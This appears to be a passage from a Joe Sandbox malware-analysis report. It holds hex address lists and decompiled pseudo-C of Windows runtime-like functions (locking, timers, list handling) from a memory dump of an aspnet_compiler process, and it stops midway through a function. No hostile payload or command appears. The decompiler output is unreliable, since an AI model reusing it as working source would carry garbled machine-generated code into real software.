                                                                                        0x0125af6c
                                                                                        0x0125af6d
                                                                                        0x0125af75
                                                                                        0x0125af7c
                                                                                        0x0125af7e
                                                                                        0x0125af80
                                                                                        0x0125af85
                                                                                        0x0125af87
                                                                                        0x0125af99
                                                                                        0x0125af89
                                                                                        0x0125af92
                                                                                        0x0125af92
                                                                                        0x0125af9e
                                                                                        0x0125afa1
                                                                                        0x0125afa3
                                                                                        0x0125afa9
                                                                                        0x0125afb0
                                                                                        0x0125afb2
                                                                                        0x0125afb4
                                                                                        0x0125afbc
                                                                                        0x0125afbc
                                                                                        0x0125afb4
                                                                                        0x0125afb0
                                                                                        0x00000000
                                                                                        0x0125afa1
                                                                                        0x0125af4f
                                                                                        0x0125af57
                                                                                        0x0125af5c
                                                                                        0x0125af5e
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0125af60
                                                                                        0x0125af64
                                                                                        0x0125af64
                                                                                        0x00000000
                                                                                        0x0125af64
                                                                                        0x0125af1a
                                                                                        0x0125af25
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0125af27
                                                                                        0x0125af28
                                                                                        0x0125af33
                                                                                        0x00000000
                                                                                        0x0125aed0
                                                                                        0x0125aed0
                                                                                        0x0125aed2
                                                                                        0x0125aee1
                                                                                        0x0125aee4
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0125aee6
                                                                                        0x0125aeec
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0125aefb
                                                                                        0x0125af07
                                                                                        0x0125afd3
                                                                                        0x0125afdb
                                                                                        0x0125afdb
                                                                                        0x00000000
                                                                                        0x0125af07
                                                                                        0x0125aed6
                                                                                        0x0125aed8
                                                                                        0x0125aedf
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0125aedf
                                                                                        0x0125aec9

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: e7a9bf286c450191c5fdb332aa6e36c2cc783f3151d11ba485e0c36d32c6370e
                                                                                        • Instruction ID: e3a331a9352d60e4287783d0e283982770c98f0bf45ce4537bc608c33dac5deb
                                                                                        • Opcode Fuzzy Hash: e7a9bf286c450191c5fdb332aa6e36c2cc783f3151d11ba485e0c36d32c6370e
                                                                                        • Instruction Fuzzy Hash: FA41F5B17202129BD766DB2DC8D6B3BBB99BF94620F044329FE16872D0DB75D801D7A0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 011BDBE9 Relevance: .1, Instructions: 149COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 86%
                                                                                        			E011BDBE9(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				signed int* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* __ebx;
				void* __edi;
				signed int _t54;
				char* _t58;
				signed int _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				intOrPtr _t72;
				intOrPtr _t73;
				signed int* _t75;
				intOrPtr _t79;
				intOrPtr _t80;
				char _t82;
				signed int _t83;
				signed int _t84;
				signed int _t88;
				signed int _t89;
				intOrPtr _t90;
				intOrPtr _t92;
				signed int _t97;
				intOrPtr _t98;
				intOrPtr* _t99;
				signed int* _t101;
				signed int* _t102;
				intOrPtr* _t103;
				intOrPtr _t105;
				signed int _t106;
				void* _t118;

				_t92 = __edx;
				_t75 = _a4;
				_t98 = __ecx;
				_v44 = __edx;
				_t106 = _t75[1];
				_v40 = __ecx;
				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) {
					_t82 = 0;
				} else {
					_t82 = 1;
				}
				_v5 = _t82;
				_t6 = _t98 + 0xc8; // 0xc9
				_t101 = _t6;
				 *((intOrPtr*)(_t98 + 0xd4)) = _a12;
				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8;
				 *((intOrPtr*)(_t98 + 0xd8)) = _a8;
				if(_t82 != 0) {
					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002;
					_t83 =  *_t75;
					_t54 = _t75[1];
					 *_t101 = _t83;
					_t84 = _t83 | _t54;
					_t101[1] = _t54;
					if(_t84 == 0) {
						_t101[1] = _t101[1] & _t84;
						 *_t101 = 1;
					}
					goto L19;
				} else {
					if(_t101 == 0) {
						E0119CC50(E01194510(0xc000000d));
						_t88 =  *_t101;
						_t97 = _t101[1];
						L15:
						_v12 = _t88;
						_t66 = _t88 -  *_t75;
						_t89 = _t97;
						asm("sbb ecx, [ebx+0x4]");
						_t118 = _t89 - _t97;
						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) {
							_t66 = _t66 | 0xffffffff;
							_t89 = 0x7fffffff;
						}
						 *_t101 = _t66;
						_t101[1] = _t89;
						L19:
						if(E011B7D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t58 = 0x7ffe0386;
						}
						_t102 = _v16;
						if( *_t58 != 0) {
							_t58 = E01268ED6(_t102, _t98);
						}
						_t76 = _v44;
						E011B2280(_t58, _v44);
						E011BDD82(_v44, _t102, _t98);
						E011BB944(_t102, _v5);
						return E011AFFB0(_t76, _t98, _t76);
					}
					_t99 = 0x7ffe03b0;
					do {
						_t103 = 0x7ffe0010;
						do {
							_t67 =  *0x1288628; // 0x0
							_v28 = _t67;
							_t68 =  *0x128862c; // 0x0
							_v32 = _t68;
							_v24 =  *((intOrPtr*)(_t99 + 4));
							_v20 =  *_t99;
							while(1) {
								_t97 =  *0x7ffe000c;
								_t90 =  *0x7FFE0008;
								if(_t97 ==  *_t103) {
									goto L10;
								}
								asm("pause");
							}
							L10:
							_t79 = _v24;
							_t99 = 0x7ffe03b0;
							_v12 =  *0x7ffe03b0;
							_t72 =  *0x7FFE03B4;
							_t103 = 0x7ffe0010;
							_v36 = _t72;
						} while (_v20 != _v12 || _t79 != _t72);
						_t73 =  *0x1288628; // 0x0
						_t105 = _v28;
						_t80 =  *0x128862c; // 0x0
					} while (_t105 != _t73 || _v32 != _t80);
					_t98 = _v40;
					asm("sbb edx, [ebp-0x20]");
					_t88 = _t90 - _v12 - _t105;
					_t75 = _a4;
					asm("sbb edx, eax");
					_t31 = _t98 + 0xc8; // 0x125fb53
					_t101 = _t31;
					 *_t101 = _t88;
					_t101[1] = _t97;
					goto L15;
				}
			}









































                                                                                        0x011bdbe9
                                                                                        0x011bdbf2
                                                                                        0x011bdbf7
                                                                                        0x011bdbf9
                                                                                        0x011bdbfc
                                                                                        0x011bdc00
                                                                                        0x011bdc03
                                                                                        0x011bdc14
                                                                                        0x011bdd54
                                                                                        0x011bdd54
                                                                                        0x011bdd54
                                                                                        0x011bdc18
                                                                                        0x011bdc1d
                                                                                        0x011bdc1d
                                                                                        0x011bdc32
                                                                                        0x011bdc3b
                                                                                        0x011bdc3e
                                                                                        0x011bdc46
                                                                                        0x011bdd5b
                                                                                        0x011bdd62
                                                                                        0x011bdd64
                                                                                        0x011bdd67
                                                                                        0x011bdd69
                                                                                        0x011bdd6b
                                                                                        0x011bdd6e
                                                                                        0x011bdd70
                                                                                        0x011bdd73
                                                                                        0x011bdd73
                                                                                        0x00000000
                                                                                        0x011bdc4c
                                                                                        0x011bdc4e
                                                                                        0x01203ae3
                                                                                        0x01203ae8
                                                                                        0x01203aea
                                                                                        0x011bdce7
                                                                                        0x011bdce9
                                                                                        0x011bdcec
                                                                                        0x011bdcee
                                                                                        0x011bdcf0
                                                                                        0x011bdcf3
                                                                                        0x011bdcf5
                                                                                        0x01203af2
                                                                                        0x01203af5
                                                                                        0x01203af5
                                                                                        0x011bdd06
                                                                                        0x011bdd08
                                                                                        0x011bdd0b
                                                                                        0x011bdd12
                                                                                        0x01203b08
                                                                                        0x011bdd18
                                                                                        0x011bdd18
                                                                                        0x011bdd18
                                                                                        0x011bdd20
                                                                                        0x011bdd23
                                                                                        0x01203b16
                                                                                        0x01203b16
                                                                                        0x011bdd29
                                                                                        0x011bdd2d
                                                                                        0x011bdd36
                                                                                        0x011bdd40
                                                                                        0x011bdd51
                                                                                        0x011bdd51
                                                                                        0x011bdc54
                                                                                        0x011bdc59
                                                                                        0x011bdc59
                                                                                        0x011bdc5e
                                                                                        0x011bdc5e
                                                                                        0x011bdc63
                                                                                        0x011bdc66
                                                                                        0x011bdc6b
                                                                                        0x011bdc78
                                                                                        0x011bdc7b
                                                                                        0x011bdc81
                                                                                        0x011bdc81
                                                                                        0x011bdc83
                                                                                        0x011bdc89
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x011bdd7b
                                                                                        0x011bdd7b
                                                                                        0x011bdc8f
                                                                                        0x011bdc8f
                                                                                        0x011bdc92
                                                                                        0x011bdc99
                                                                                        0x011bdc9f
                                                                                        0x011bdca5
                                                                                        0x011bdcaa
                                                                                        0x011bdcaa
                                                                                        0x011bdcb3
                                                                                        0x011bdcb8
                                                                                        0x011bdcbb
                                                                                        0x011bdcc1
                                                                                        0x011bdccf
                                                                                        0x011bdcd2
                                                                                        0x011bdcd5
                                                                                        0x011bdcd7
                                                                                        0x011bdcda
                                                                                        0x011bdcdc
                                                                                        0x011bdcdc
                                                                                        0x011bdce2
                                                                                        0x011bdce4
                                                                                        0x00000000
                                                                                        0x011bdce4

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 298980f3069c972a7cd52c9868838e8ff59f61364353d20147280218ac8a68f4
                                                                                        • Instruction ID: 1f27375edc12ff1a7b052246adab8259c13f24e8fd91d67ef30e6ebed64ed30a
                                                                                        • Opcode Fuzzy Hash: 298980f3069c972a7cd52c9868838e8ff59f61364353d20147280218ac8a68f4
                                                                                        • Instruction Fuzzy Hash: 7451BD71A01216CFCF1DCFA8D4D0AAEBBF1BF48318F21825AD595A7381DB30A944CB91
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 011AEF40 Relevance: .1, Instructions: 147COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 96%
                                                                                        			E011AEF40(intOrPtr __ecx) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t58;
				char _t59;
				signed char _t69;
				void* _t73;
				signed int _t74;
				char _t79;
				signed char _t81;
				signed int _t85;
				signed int _t87;
				intOrPtr _t90;
				signed char* _t91;
				void* _t92;
				signed int _t94;
				void* _t96;

				_t90 = __ecx;
				_v16 = __ecx;
				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
					_t58 =  *((intOrPtr*)(__ecx));
					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
						E01199080(_t73, __ecx, __ecx, _t92);
					}
				}
				_t74 = 0;
				_t96 =  *0x7ffe036a - 1;
				_v12 = 0;
				_v7 = 0;
				if(_t96 > 0) {
					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
					_v12 = _t74;
					_v7 = _t96 != 0;
				}
				_t79 = 0;
				_v8 = 0;
				_v5 = 0;
				while(1) {
					L4:
					_t59 = 1;
					L5:
					while(1) {
						if(_t59 == 0) {
							L12:
							_t21 = _t90 + 4; // 0x77d0c21e
							_t87 =  *_t21;
							_v6 = 0;
							if(_t79 != 0) {
								if((_t87 & 0x00000002) != 0) {
									goto L19;
								}
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000003;
								} else {
									_t51 = _t87 - 2; // -2
									_t74 = _t51;
								}
								goto L15;
							} else {
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000001;
								} else {
									_t26 = _t87 - 4; // -4
									_t74 = _t26;
									if((_t74 & 0x00000002) == 0) {
										_t74 = _t74 - 2;
									}
								}
								L15:
								if(_t74 == _t87) {
									L19:
									E01192D8A(_t74, _t90, _t87, _t90);
									_t74 = _v12;
									_v8 = 1;
									if(_v7 != 0 && _t74 > 0x64) {
										_t74 = _t74 - 1;
										_v12 = _t74;
									}
									_t79 = _v5;
									goto L4;
								}
								asm("lock cmpxchg [esi], ecx");
								if(_t87 != _t87) {
									_t74 = _v12;
									_t59 = 0;
									_t79 = _v5;
									continue;
								}
								if(_v6 != 0) {
									_t74 = _v12;
									L25:
									if(_v7 != 0) {
										if(_t74 < 0x7d0) {
											if(_v8 == 0) {
												_t74 = _t74 + 1;
											}
										}
										_t38 = _t90 + 0x14; // 0x0
										_t39 = _t90 + 0x14; // 0x0
										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
											_t85 = _t85 & 0xff000000;
										}
										 *(_t90 + 0x14) = _t85;
									}
									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
									 *((intOrPtr*)(_t90 + 8)) = 1;
									return 0;
								}
								_v5 = 1;
								_t87 = _t74;
								goto L19;
							}
						}
						_t94 = _t74;
						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
						if(_t74 == 0) {
							goto L12;
						} else {
							_t91 = _t90 + 4;
							goto L8;
							L9:
							while((_t81 & 0x00000001) != 0) {
								_t69 = _t81;
								asm("lock cmpxchg [edi], edx");
								if(_t69 != _t81) {
									_t81 = _t69;
									continue;
								}
								_t90 = _v16;
								goto L25;
							}
							asm("pause");
							_t94 = _t94 - 1;
							if(_t94 != 0) {
								L8:
								_t81 =  *_t91;
								goto L9;
							} else {
								_t90 = _v16;
								_t79 = _v5;
								goto L12;
							}
						}
					}
				}
			}




























                                                                                        0x011aef4b
                                                                                        0x011aef4d
                                                                                        0x011aef57
                                                                                        0x011af0bd
                                                                                        0x011af0c2
                                                                                        0x011af0d2
                                                                                        0x011af0d2
                                                                                        0x011af0c2
                                                                                        0x011aef5d
                                                                                        0x011aef5f
                                                                                        0x011aef67
                                                                                        0x011aef6a
                                                                                        0x011aef6d
                                                                                        0x011aef74
                                                                                        0x011aef7f
                                                                                        0x011aef82
                                                                                        0x011aef82
                                                                                        0x011aef86
                                                                                        0x011aef88
                                                                                        0x011aef8c
                                                                                        0x011aef8f
                                                                                        0x011aef8f
                                                                                        0x011aef8f
                                                                                        0x00000000
                                                                                        0x011aef91
                                                                                        0x011aef93
                                                                                        0x011aefc4
                                                                                        0x011aefc4
                                                                                        0x011aefc4
                                                                                        0x011aefca
                                                                                        0x011aefd0
                                                                                        0x011af0a6
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x011af0af
                                                                                        0x011fbb06
                                                                                        0x011fbb0a
                                                                                        0x011af0b5
                                                                                        0x011af0b5
                                                                                        0x011af0b5
                                                                                        0x011af0b5
                                                                                        0x00000000
                                                                                        0x011aefd6
                                                                                        0x011aefd9
                                                                                        0x011af0de
                                                                                        0x011af0e2
                                                                                        0x011aefdf
                                                                                        0x011aefdf
                                                                                        0x011aefdf
                                                                                        0x011aefe5
                                                                                        0x011fbafc
                                                                                        0x011fbafc
                                                                                        0x011aefe5
                                                                                        0x011aefeb
                                                                                        0x011aefed
                                                                                        0x011af00f
                                                                                        0x011af011
                                                                                        0x011af01a
                                                                                        0x011af01d
                                                                                        0x011af021
                                                                                        0x011af028
                                                                                        0x011af029
                                                                                        0x011af029
                                                                                        0x011af02c
                                                                                        0x00000000
                                                                                        0x011af02c
                                                                                        0x011aeff3
                                                                                        0x011aeff9
                                                                                        0x011af0ea
                                                                                        0x011af0ed
                                                                                        0x011af0ef
                                                                                        0x00000000
                                                                                        0x011af0ef
                                                                                        0x011af003
                                                                                        0x011fbb12
                                                                                        0x011af045
                                                                                        0x011af049
                                                                                        0x011af051
                                                                                        0x011af09e
                                                                                        0x011af0a0
                                                                                        0x011af0a0
                                                                                        0x011af09e
                                                                                        0x011af053
                                                                                        0x011af064
                                                                                        0x011af064
                                                                                        0x011af06b
                                                                                        0x011fbb1a
                                                                                        0x011fbb1a
                                                                                        0x011af071
                                                                                        0x011af071
                                                                                        0x011af07d
                                                                                        0x011af082
                                                                                        0x011af08f
                                                                                        0x011af08f
                                                                                        0x011af009
                                                                                        0x011af00d
                                                                                        0x00000000
                                                                                        0x011af00d
                                                                                        0x011aefd0
                                                                                        0x011aef97
                                                                                        0x011aefa5
                                                                                        0x011aefaa
                                                                                        0x00000000
                                                                                        0x011aefac
                                                                                        0x011aefac
                                                                                        0x011aefac
                                                                                        0x00000000
                                                                                        0x011aefb2
                                                                                        0x011af036
                                                                                        0x011af03a
                                                                                        0x011af040
                                                                                        0x011af090
                                                                                        0x00000000
                                                                                        0x011af092
                                                                                        0x011af042
                                                                                        0x00000000
                                                                                        0x011af042
                                                                                        0x011aefb7
                                                                                        0x011aefb9
                                                                                        0x011aefbc
                                                                                        0x011aefb0
                                                                                        0x011aefb0
                                                                                        0x00000000
                                                                                        0x011aefbe
                                                                                        0x011aefbe
                                                                                        0x011aefc1
                                                                                        0x00000000
                                                                                        0x011aefc1
                                                                                        0x011aefbc
                                                                                        0x011aefaa
                                                                                        0x011aef91

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                                                        • Instruction ID: 43d265f62afaafaa0147f9b24b9ba60385a4e2c95412731557dfba3d6af55195
                                                                                        • Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                                                        • Instruction Fuzzy Hash: F0511934E0524ADFDB2DCB6CC1D07AEBFB2EF05314F5481A8C55557282C375A989C752
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0126740D Relevance: .1, Instructions: 141COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 84%
                                                                                        			E0126740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
				signed short* _v8;
				intOrPtr _v12;
				intOrPtr _t55;
				void* _t56;
				intOrPtr* _t66;
				intOrPtr* _t69;
				void* _t74;
				intOrPtr* _t78;
				intOrPtr* _t81;
				intOrPtr* _t82;
				intOrPtr _t83;
				signed short* _t84;
				intOrPtr _t85;
				signed int _t87;
				intOrPtr* _t90;
				intOrPtr* _t93;
				intOrPtr* _t94;
				void* _t98;

				_t84 = __edx;
				_t80 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t55 = __ecx;
				_v8 = __edx;
				_t87 =  *__edx & 0x0000ffff;
				_v12 = __ecx;
				_t3 = _t55 + 0x154; // 0x154
				_t93 = _t3;
				_t78 =  *_t93;
				_t4 = _t87 + 2; // 0x2
				_t56 = _t4;
				while(_t78 != _t93) {
					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
						L4:
						_t78 =  *_t78;
						continue;
					} else {
						_t7 = _t78 + 0x18; // 0x18
						if(E011ED4F0(_t7, _t84[2], _t87) == _t87) {
							_t40 = _t78 + 0xc; // 0xc
							_t94 = _t40;
							_t90 =  *_t94;
							while(_t90 != _t94) {
								_t41 = _t90 + 8; // 0x8
								_t74 = E011DF380(_a4, _t41, 0x10);
								_t98 = _t98 + 0xc;
								if(_t74 != 0) {
									_t90 =  *_t90;
									continue;
								}
								goto L12;
							}
							_t82 = L011B4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
							if(_t82 != 0) {
								_t46 = _t78 + 0xc; // 0xc
								_t69 = _t46;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t85 =  *_t69;
								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
									L20:
									_t82 = 3;
									asm("int 0x29");
								}
								 *((intOrPtr*)(_t82 + 4)) = _t69;
								 *_t82 = _t85;
								 *((intOrPtr*)(_t85 + 4)) = _t82;
								 *_t69 = _t82;
								 *(_t78 + 8) =  *(_t78 + 8) + 1;
								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
								goto L11;
							} else {
								L18:
								_push(0xe);
								_pop(0);
							}
						} else {
							_t84 = _v8;
							_t9 = _t87 + 2; // 0x2
							_t56 = _t9;
							goto L4;
						}
					}
					L12:
					return 0;
				}
				_t10 = _t87 + 0x1a; // 0x1a
				_t78 = L011B4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
				if(_t78 == 0) {
					goto L18;
				} else {
					_t12 = _t87 + 2; // 0x2
					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
					_t16 = _t78 + 0x18; // 0x18
					E011DF3E0(_t16, _v8[2], _t87);
					 *((short*)(_t78 + _t87 + 0x18)) = 0;
					_t19 = _t78 + 0xc; // 0xc
					_t66 = _t19;
					 *((intOrPtr*)(_t66 + 4)) = _t66;
					 *_t66 = _t66;
					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
					_t81 = L011B4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
					if(_t81 == 0) {
						goto L18;
					} else {
						_t26 = _t78 + 0xc; // 0xc
						_t69 = _t26;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t85 =  *_t69;
						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
							goto L20;
						} else {
							 *((intOrPtr*)(_t81 + 4)) = _t69;
							 *_t81 = _t85;
							 *((intOrPtr*)(_t85 + 4)) = _t81;
							 *_t69 = _t81;
							_t83 = _v12;
							 *(_t78 + 8) = 1;
							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							_t34 = _t83 + 0x154; // 0x1ba
							_t69 = _t34;
							_t85 =  *_t69;
							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
								goto L20;
							} else {
								 *_t78 = _t85;
								 *((intOrPtr*)(_t78 + 4)) = _t69;
								 *((intOrPtr*)(_t85 + 4)) = _t78;
								 *_t69 = _t78;
								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							}
						}
						goto L11;
					}
				}
				goto L12;
			}





















                                                                                        0x0126740d
                                                                                        0x0126740d
                                                                                        0x01267412
                                                                                        0x01267413
                                                                                        0x01267416
                                                                                        0x01267418
                                                                                        0x0126741c
                                                                                        0x0126741f
                                                                                        0x01267422
                                                                                        0x01267422
                                                                                        0x01267428
                                                                                        0x0126742a
                                                                                        0x0126742a
                                                                                        0x01267451
                                                                                        0x01267432
                                                                                        0x0126744f
                                                                                        0x0126744f
                                                                                        0x00000000
                                                                                        0x01267434
                                                                                        0x01267438
                                                                                        0x01267443
                                                                                        0x01267517
                                                                                        0x01267517
                                                                                        0x0126751a
                                                                                        0x01267535
                                                                                        0x01267520
                                                                                        0x01267527
                                                                                        0x0126752c
                                                                                        0x01267531
                                                                                        0x01267533
                                                                                        0x00000000
                                                                                        0x01267533
                                                                                        0x00000000
                                                                                        0x01267531
                                                                                        0x0126754b
                                                                                        0x0126754f
                                                                                        0x0126755c
                                                                                        0x0126755c
                                                                                        0x0126755f
                                                                                        0x01267560
                                                                                        0x01267561
                                                                                        0x01267562
                                                                                        0x01267563
                                                                                        0x01267568
                                                                                        0x0126756a
                                                                                        0x0126756c
                                                                                        0x0126756d
                                                                                        0x0126756d
                                                                                        0x0126756f
                                                                                        0x01267572
                                                                                        0x01267574
                                                                                        0x01267577
                                                                                        0x0126757c
                                                                                        0x0126757f
                                                                                        0x00000000
                                                                                        0x01267551
                                                                                        0x01267551
                                                                                        0x01267551
                                                                                        0x01267553
                                                                                        0x01267553
                                                                                        0x01267449
                                                                                        0x01267449
                                                                                        0x0126744c
                                                                                        0x0126744c
                                                                                        0x00000000
                                                                                        0x0126744c
                                                                                        0x01267443
                                                                                        0x0126750e
                                                                                        0x01267514
                                                                                        0x01267514
                                                                                        0x01267455
                                                                                        0x01267469
                                                                                        0x0126746d
                                                                                        0x00000000
                                                                                        0x01267473
                                                                                        0x01267473
                                                                                        0x01267476
                                                                                        0x01267480
                                                                                        0x01267484
                                                                                        0x0126748e
                                                                                        0x01267493
                                                                                        0x01267493
                                                                                        0x01267496
                                                                                        0x01267499
                                                                                        0x012674a1
                                                                                        0x012674b1
                                                                                        0x012674b5
                                                                                        0x00000000
                                                                                        0x012674bb
                                                                                        0x012674c1
                                                                                        0x012674c1
                                                                                        0x012674c4
                                                                                        0x012674c5
                                                                                        0x012674c6
                                                                                        0x012674c7
                                                                                        0x012674c8
                                                                                        0x012674cd
                                                                                        0x00000000
                                                                                        0x012674d3
                                                                                        0x012674d3
                                                                                        0x012674d6
                                                                                        0x012674d8
                                                                                        0x012674db
                                                                                        0x012674dd
                                                                                        0x012674e0
                                                                                        0x012674e7
                                                                                        0x012674ee
                                                                                        0x012674ee
                                                                                        0x012674f4
                                                                                        0x012674f9
                                                                                        0x00000000
                                                                                        0x012674fb
                                                                                        0x012674fb
                                                                                        0x012674fd
                                                                                        0x01267500
                                                                                        0x01267503
                                                                                        0x01267505
                                                                                        0x01267505
                                                                                        0x012674f9
                                                                                        0x00000000
                                                                                        0x012674cd
                                                                                        0x012674b5
                                                                                        0x00000000

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                                                        • Instruction ID: 3089b1066cf87f6500d74bc4e5013f0505a8123160b09477e86a354717d3d3d3
                                                                                        • Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                                                        • Instruction Fuzzy Hash: B751A071510646EFDB16CF18E480A95BBB9FF45308F15C1AAE9089F252E371E986CB90
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 011C2990 Relevance: .1, Instructions: 133COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 97%
                                                                                        			E011C2990() {
				signed int* _t62;
				signed int _t64;
				intOrPtr _t66;
				signed short* _t69;
				intOrPtr _t76;
				signed short* _t79;
				void* _t81;
				signed int _t82;
				signed short* _t83;
				signed int _t87;
				intOrPtr _t91;
				void* _t98;
				signed int _t99;
				void* _t101;
				signed int* _t102;
				void* _t103;
				void* _t104;
				void* _t107;

				_push(0x20);
				_push(0x126ff00);
				E011ED08C(_t81, _t98, _t101);
				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
				_t99 = 0;
				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
				_t82 =  *((intOrPtr*)(_t103 + 0x10));
				if(_t82 == 0) {
					_t62 = 0xc0000100;
				} else {
					 *((intOrPtr*)(_t103 - 4)) = 0;
					_t102 = 0xc0000100;
					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
					_t64 = 4;
					while(1) {
						 *(_t103 - 0x24) = _t64;
						if(_t64 == 0) {
							break;
						}
						_t87 = _t64 * 0xc;
						 *(_t103 - 0x2c) = _t87;
						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0x1171664));
						if(_t107 <= 0) {
							if(_t107 == 0) {
								_t79 = E011DE5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0x1171668)), _t82);
								_t104 = _t104 + 0xc;
								__eflags = _t79;
								if(__eflags == 0) {
